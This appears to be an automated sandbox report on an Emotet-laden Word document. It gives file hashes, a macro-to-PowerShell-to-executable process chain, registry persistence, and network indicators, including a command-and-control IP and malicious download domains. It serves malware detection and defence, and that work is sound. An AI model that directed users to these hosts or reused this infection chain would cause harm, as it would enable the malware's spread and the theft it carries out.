File name: BL_B5HP885M08_HB.doc

Full analysis: https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 18, 2019, 20:06:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet-doc, emotet, generated-doc, trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Wooden Mouse Legacy Handcrafted, Subject: Intelligent Granite Bike, Author: Ezekiel Dare, Comments: connect, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 2792353F03A08766D5A8A5CFCDC11755
SHA1: 3B9A6EF019994990FA79B8FD063BFD4AF8746672
SHA256: 7B2142363813A41FD3A512CA6BBD2E3D73D274558F58CA990D78A1537EBFCBD8
SSDEEP: 6144:VC1qmTgpbxDj2kCUSfp400TPLkIq7NSU4jJntATfDxBlPi75:VC1qmTgpbxDj2kCUSfp400/Xq7NSU4Vp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 133.exe (PID: 2764)
      • 133.exe (PID: 3812)
      • 133.exe (PID: 2576)
      • 133.exe (PID: 4016)
      • easywindow.exe (PID: 552)
      • easywindow.exe (PID: 2980)
      • easywindow.exe (PID: 3672)
      • easywindow.exe (PID: 3076)
    • Emotet process was detected

      • 133.exe (PID: 2764)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3672)
    • Connects to CnC server

      • easywindow.exe (PID: 3672)
    • EMOTET was detected

      • easywindow.exe (PID: 3672)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2336)
    • PowerShell script executed

      • powershell.exe (PID: 2336)
    • Executed via WMI

      • powershell.exe (PID: 2336)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2336)
      • 133.exe (PID: 2764)
    • Starts itself from another location

      • 133.exe (PID: 2764)
    • Connects to server without host name

      • easywindow.exe (PID: 3672)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3564)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3564)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2336)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Tasty Wooden Mouse Legacy Handcrafted
Subject: Intelligent Granite Bike
Author: Ezekiel Dare
Keywords: -
Comments: connect
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 14:32:00
ModifyDate: 2019:09:18 14:32:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Roberts - Lebsack
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Parker
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Total processes: 46
Monitored processes: 10
Malicious processes: 6
Suspicious processes: 3

Behavior graph

(Graph image not reproduced. Process chain as labelled in the graph: start → winword.exe (no specs) → powershell.exe → 133.exe (no specs) ×3 → 133.exe #EMOTET → easywindow.exe (no specs) ×3 → easywindow.exe #EMOTET; two edges are labelled "drop and start".)

Process information

PID: 3564
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\BL_B5HP885M08_HB.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 2336
CMD: powershell -encod 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2576
CMD: "C:\Users\admin\133.exe"
Path: C:\Users\admin\133.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 3812
CMD: "C:\Users\admin\133.exe"
Path: C:\Users\admin\133.exe
Parent process: 133.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 4016
CMD: --8ddf1eef
Path: C:\Users\admin\133.exe
Parent process: 133.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 2764
CMD: --8ddf1eef
Path: C:\Users\admin\133.exe
Parent process: 133.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 552
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: 133.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 2980
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 3076
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 3672
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Integrity Level: MEDIUM
Total events: 2 684
Read events: 2 463
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 10
Text files: 2
Unknown types: 45

Dropped files

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR9B99.tmp.cvr
MD5:
SHA256:

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\BL_B5HP885M08_HB.doc.LNK
Type: lnk
MD5: 930D977E5284E2928DD8793A2934CD39
SHA256: 21B757462FE75C8D796324413C61BD7D78FF7E13B5B2EEF08F5740849A21E030

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F04BF2A.wmf
Type: wmf
MD5: E7371AAF6E2069BF5A62504621DBB16B
SHA256: 88F638AA35D457272EDE0EF04828FC1234A1C692F1D4A6A5FC8C61AAEA84AF84

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D98B4DC2.wmf
Type: wmf
MD5: E275B9D39B1EE83BDACD6FD0FEDC7E9F
SHA256: C734B66B3F0C0B1909E374AFD300BF413C97FC5BC0AF78AFC05A522921B8C31C

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F23D328D.wmf
Type: wmf
MD5: 2353260EC885C3A98A6C89D22AFF1248
SHA256: E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\461EB0C8.wmf
Type: wmf
MD5: 73658496962CE3CEF198A29B1E1E6875
SHA256: AD0827A843CFFE953C2634A18077B0428A60B4024285CA199601F031708A54D3

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D717320.wmf
Type: wmf
MD5: 9C82C46ADD9E05F1EC26C90EBED6FC3B
SHA256: 4C3302B7DD579D9D80E452B882FFA141A763B87681B67A71F28AECC69CCD5CBF

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5A3FA16.wmf
Type: wmf
MD5: 15D50A1E4FACE721563EEE94D5413CE8
SHA256: D1EAF8F0F79906A21F24340A041CCACBB0568324110E08B90E003C6ECEB81091

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D86AA29.wmf
Type: wmf
MD5: B419C90F42F3A4C5D5601F2F63E4E4C0
SHA256: 06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7

PID: 3564
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
Type: tlb
MD5: FC520A0524A7464A2C3BD220271713B6
SHA256: 8C3EFC362C48D763D6E101C6C7AA087A85F5EA0C06F23A1F62DD4F64810B3775
HTTP(S) requests: 1
TCP/UDP connections: 4
DNS requests: 2
Threats: 0

HTTP requests

PID: 3672
Process: easywindow.exe
Method: POST
HTTP Code: 200
IP: 190.18.146.70:80
URL: http://190.18.146.70/site/
CN: AR
Type: binary
Size: 148 b
Reputation: malicious

Connections

IP: 190.18.146.70:80
ASN: CABLEVISION S.A.
CN: AR
Reputation: malicious

PID: 2336
Process: powershell.exe
IP: 111.67.206.122:443
Domain: pipizhanzhang.com
ASN: China Unicom Beijing Province Network
CN: CN
Reputation: unknown

PID: 2336
Process: powershell.exe
IP: 148.251.180.153:443
Domain: www.patrickglobalusa.com
ASN: Hetzner Online GmbH
CN: DE
Reputation: malicious

DNS requests

Domain: www.patrickglobalusa.com
IP: 148.251.180.153
Reputation: malicious

Domain: pipizhanzhang.com
IP: 111.67.206.122
Reputation: unknown

Threats

PID: 3672
Process: easywindow.exe
Class: A Network Trojan was detected
Message: AV TROJAN W32/Emotet CnC Checkin (Apr 2019)

PID: 3672
Process: easywindow.exe
Class: A Network Trojan was detected
Message: MALWARE [PTsecurity] Feodo/Emotet
3 ETPRO signatures available at the full report
No debug info